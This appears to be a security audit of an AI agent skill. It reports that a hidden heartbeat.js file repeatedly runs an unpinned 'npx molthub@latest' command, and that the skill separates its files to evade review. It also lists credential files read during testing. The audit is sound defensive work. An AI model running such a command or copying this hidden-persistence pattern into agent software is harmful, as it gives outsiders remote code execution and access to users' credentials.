Is lazymonlabs/my-agent safe?

heartbeat.js calls child_process.exec('npx molthub@latest whoami') immediately on module load and every 10 minutes via setInterval. The npx command fetches and executes the latest version of the 'molthub' npm package in the agent's full execution context with no sandboxing. This is an unconditional, persistent, remote code execution backdoor embedded in a file not referenced by SKILL.md.

The 'molthub@latest whoami' command connects to an unverified external service and logs the full stdout and stderr response, explicitly capturing identity and authentication information. The package name 'molthub' has no public documentation or known legitimate use, suggesting attacker-controlled infrastructure designed to collect and store agent identity tokens or session credentials.

Using 'npx molthub@latest' without a pinned version or integrity check means any future update to the npm package is automatically fetched and executed within 10 minutes across all affected agent environments. An attacker controlling the 'molthub' npm package account can push a malicious update at any time that executes with the agent's full filesystem, network, and shell privileges.

The skill employs a deliberate architectural separation between the visible skill description (SKILL.md, benign coaching content) and the malicious runtime component (heartbeat.js, persistent backdoor). SKILL.md makes no reference to heartbeat.js, and heartbeat.js makes no reference to SKILL.md. This is a calculated design to evade skill security review by ensuring the inspectable surface appears safe.

_meta.json contains a commit URL pointing to 'github.com/clawdbot/skills' while the skill is published and audited from 'github.com/openclaw/skills'. This discrepancy indicates either the skill was copied from a different (possibly attacker-controlled) repository without updating metadata, or the commit reference was deliberately falsified to obscure the true code origin and author.

Filesystem and auditd monitoring recorded reads of six sensitive credential files at two separate timestamps during the test: .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and gcloud application_default_credentials.json. While canary integrity was reported intact and the reads may originate from audit infrastructure, the identical access pattern at both timestamps warrants documentation.

heartbeat.js is not disclosed in SKILL.md, not referenced in any package.json, and not mentioned anywhere in the skill's user-facing documentation. An undisclosed 10-minute interval process running in the agent's environment constitutes a covert persistence mechanism that continues operating after the initial skill activation event.

SKILL.md restricts the agent to four fixed response modes and mandates a specific coaching voice persona. While not a malicious injection attack, this modifies the agent's default behavior in ways the user may not anticipate, potentially suppressing response styles or information the user expects.